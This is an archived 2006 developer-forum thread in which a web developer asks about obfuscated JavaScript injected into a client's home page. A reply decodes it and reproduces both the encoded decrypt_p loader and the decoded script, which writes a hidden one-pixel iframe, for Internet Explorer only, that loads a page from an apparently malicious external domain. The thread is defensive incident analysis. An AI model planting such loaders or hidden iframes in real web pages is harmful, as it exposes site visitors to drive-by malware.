473,325 Members | 2,872 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,325 software developers and data experts.

Unknown javascript appeared in a clients home page

Hello,
I'm hoping someone might help us understand the code listed below.

One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.

The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25, 32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46, 52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34, 56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7 ,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);f or(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8 ;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveR szie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4 rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3 LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7o SO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_w QavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@p iJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9 @Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3Pi yKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.

Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.

Could the hosting company be compromized?

Any information or insight is much appreciated.

Cheers,
Ken

Nov 26 '06 #1
5 2732

It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.

ke*********@gmail.com wrote:
Hello,
I'm hoping someone might help us understand the code listed below.

One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.

The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25, 32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46, 52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34, 56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7 ,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);f or(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8 ;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveR szie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4 rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3 LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7o SO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_w QavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@p iJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9 @Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3Pi yKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>

Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.

Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.

Could the hosting company be compromized?

Any information or insight is much appreciated.

Cheers,
Ken
Nov 26 '06 #2

drclue wrote:
It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.
The code was inserted into the body of the page, directly after the
<bodytag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser.

Nov 26 '06 #3
ke*********@gmail.com wrote:
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>

This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".

the decrypt function decodes this into the following javascript program
and inserts it into the web page.

<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>

As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at

http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php

Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007

The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

---------------------------------------------------------------------------
http://www.hunlock.com -- Permanently under construction (And proud of it!)
$FA
Nov 26 '06 #4

pcx99 wrote:
>
The web server for this domain is presently down so what the iframe was
actually doing is an open question.

But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.

Wow, thank you.
Could I assume that this spyware is on the hosts server?

We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.

Many thanks for the insight.

Cheers,
Ken

Nov 26 '06 #5
More about it here:
http://www.aboutus.org/Wsfgfdgrtyhgfd.net

On Nov 25, 6:42 pm, "Mr. Ken" <ken.robe...@gmail.comwrote:
pcx99 wrote:
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.Wow, thank you.
Could I assume that this spyware is on the hosts server?

We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.

Many thanks for the insight.

Cheers,
Ken
Dec 8 '06 #6

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

53
by: Cardman | last post by:
Greetings, I am trying to solve a problem that has been inflicting my self created Order Forms for a long time, where the problem is that as I cannot reproduce this error myself, then it is...
5
by: TrvlOrm | last post by:
Can any one please help me...I am new to JavaScript and I have been struggling with this code for days now and can't figure it out. I would like to get the Buttons to correspond with the action...
136
by: Matt Kruse | last post by:
http://www.JavascriptToolbox.com/bestpractices/ I started writing this up as a guide for some people who were looking for general tips on how to do things the 'right way' with Javascript. Their...
9
by: Klaus Johannes Rusch | last post by:
IE7 returns "unknown" instead of "undefined" when querying the type of an unknown property of an object, for example document.write(typeof window.missingproperty); Has "unknown" been defined...
27
by: Chris | last post by:
Hi, I have a form for uploading documents and inserting the data into a mysql db. I would like to validate the form. I have tried a couple of Javascript form validation functions, but it...
36
by: Mark Rae | last post by:
Hi, Just had an interesting message from someone who was unable to view one of my sites because they have JavaScript turned off, and expecting me to re-write my site so that they could view...
1
by: TARUN | last post by:
Hello All, I am facing problem regarding Atlas. I have install the AtlasSetup.msi in my .NET framework 2.0, and i open the new Atlas Website...... Let me first explain the my senario, I...
7
by: John | last post by:
Hi Everyone, I'm having this extremely annoying problem with Internet Explorer 6, giving me an error message saying "unknown runtime error" whenever I try to alter the contents of a <divelement...
1
by: willCrain | last post by:
I am pretty much stuck and dont know which direction to procede in figuring this out. My desired end result is to have top_home button and bottom_home button to be on opposite areas of the page, but...
0
by: DolphinDB | last post by:
Tired of spending countless mintues downsampling your data? Look no further! In this article, you’ll learn how to efficiently downsample 6.48 billion high-frequency records to 61 million...
0
by: ryjfgjl | last post by:
ExcelToDatabase: batch import excel into database automatically...
0
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
1
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
0
by: Vimpel783 | last post by:
Hello! Guys, I found this code on the Internet, but I need to modify it a little. It works well, the problem is this: Data is sent from only one cell, in this case B5, but it is necessary that data...
0
by: ArrayDB | last post by:
The error message I've encountered is; ERROR:root:Error generating model response: exception: access violation writing 0x0000000000005140, which seems to be indicative of an access violation...
1
by: Defcon1945 | last post by:
I'm trying to learn Python using Pycharm but import shutil doesn't work
0
by: af34tf | last post by:
Hi Guys, I have a domain whose name is BytesLimited.com, and I want to sell it. Does anyone know about platforms that allow me to list my domain in auction for free. Thank you
0
by: Faith0G | last post by:
I am starting a new it consulting business and it's been a while since I setup a new website. Is wordpress still the best web based software for hosting a 5 page website? The webpages will be...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.